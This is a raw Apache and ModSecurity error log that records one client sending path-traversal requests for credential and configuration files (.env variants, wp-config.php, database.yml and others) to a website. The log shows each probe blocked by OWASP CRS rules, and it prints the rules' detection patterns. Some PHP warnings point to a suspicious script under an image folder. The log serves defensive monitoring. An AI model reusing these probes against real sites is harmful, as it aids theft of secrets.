[Tue May 12 04:39:55.959843 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS-wgpmE1yW0glLdgfcwAAANY"], referer: https://tchatbooster.com/img../../../.env
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/64/433946252d4001c6e8db25afc790fb0dc1caa0 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/64/433946252d4001c6e8db25afc790fb0dc1caa0 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:39:56.023387 2026] [core:error] [pid 1808852:tid 1808863] [client 45.148.10.166:2412] AH10244: invalid URI path (/img../../../../.env)
[Tue May 12 04:39:56.527599 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS_AgpmE1yW0glLdgfdAAAANY"], referer: https://tchatbooster.com/img../../../../.env
[Tue May 12 04:39:56.527792 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS_AgpmE1yW0glLdgfdAAAANY"], referer: https://tchatbooster.com/img../../../../.env
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/d0/32ab4c9b18c194418c0a964fa2c48ca1860859 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/d0/32ab4c9b18c194418c0a964fa2c48ca1860859 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:39:56.994275 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS_AgpmE1yW0glLdgfdAAAANY"], referer: https://tchatbooster.com/img../../../../.env
[Tue May 12 04:39:57.095480 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS_c1tk6y7yBJLpJoqBQAAAIM"]
[Tue May 12 04:39:57.095566 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS_c1tk6y7yBJLpJoqBQAAAIM"]
[Tue May 12 04:39:57.095732 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS_c1tk6y7yBJLpJoqBQAAAIM"]
[Tue May 12 04:39:57.524321 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS_c1tk6y7yBJLpJoqBQAAAIM"]
[Tue May 12 04:39:57.544819 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS_QgpmE1yW0glLdgfdQAAANY"], referer: https://tchatbooster.com/img../../.env.local
[Tue May 12 04:39:57.545048 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS_QgpmE1yW0glLdgfdQAAANY"], referer: https://tchatbooster.com/img../../.env.local
[Tue May 12 04:39:58.009117 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS_QgpmE1yW0glLdgfdQAAANY"], referer: https://tchatbooster.com/img../../.env.local
[Tue May 12 04:39:58.034734 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS_s1tk6y7yBJLpJoqBgAAAIM"]
[Tue May 12 04:39:58.034812 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS_s1tk6y7yBJLpJoqBgAAAIM"]
[Tue May 12 04:39:58.034987 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS_s1tk6y7yBJLpJoqBgAAAIM"]
[Tue May 12 04:39:58.466072 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS_s1tk6y7yBJLpJoqBgAAAIM"]
[Tue May 12 04:39:58.484648 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS_ggpmE1yW0glLdgfdgAAANY"], referer: https://tchatbooster.com/img../../.env.production
[Tue May 12 04:39:58.484864 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS_ggpmE1yW0glLdgfdgAAANY"], referer: https://tchatbooster.com/img../../.env.production
[Tue May 12 04:39:58.951266 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS_ggpmE1yW0glLdgfdgAAANY"], referer: https://tchatbooster.com/img../../.env.production
[Tue May 12 04:39:58.975577 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS_s1tk6y7yBJLpJoqBwAAAIM"]
[Tue May 12 04:39:58.975667 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS_s1tk6y7yBJLpJoqBwAAAIM"]
[Tue May 12 04:39:58.975835 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS_s1tk6y7yBJLpJoqBwAAAIM"]
[Tue May 12 04:39:59.412870 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS_s1tk6y7yBJLpJoqBwAAAIM"]
[Tue May 12 04:39:59.433274 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS_wgpmE1yW0glLdgfeAAAANY"], referer: https://tchatbooster.com/img../../wp-config.php
[Tue May 12 04:39:59.433491 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS_wgpmE1yW0glLdgfeAAAANY"], referer: https://tchatbooster.com/img../../wp-config.php
[Tue May 12 04:39:59.902774 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.166:2344] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS_wgpmE1yW0glLdgfeAAAANY"], referer: https://tchatbooster.com/img../../wp-config.php
[Tue May 12 04:39:59.927511 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKS_81tk6y7yBJLpJoqCAAAAIM"]
[Tue May 12 04:39:59.927721 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKS_81tk6y7yBJLpJoqCAAAAIM"]
[Tue May 12 04:40:00.370329 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS_81tk6y7yBJLpJoqCAAAAIM"]
[Tue May 12 04:40:00.880861 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKTAM1tk6y7yBJLpJoqCQAAAIM"]
[Tue May 12 04:40:00.881099 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKTAM1tk6y7yBJLpJoqCQAAAIM"]
[Tue May 12 04:40:01.320625 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTAM1tk6y7yBJLpJoqCQAAAIM"]
[Tue May 12 04:40:01.842119 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKTAc1tk6y7yBJLpJoqCwAAAIM"]
[Tue May 12 04:40:01.842323 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKTAc1tk6y7yBJLpJoqCwAAAIM"]
[Tue May 12 04:40:02.283434 2026] [security2:error] [pid 1820198:tid 1820203] [client 45.148.10.166:64488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTAc1tk6y7yBJLpJoqCwAAAIM"]
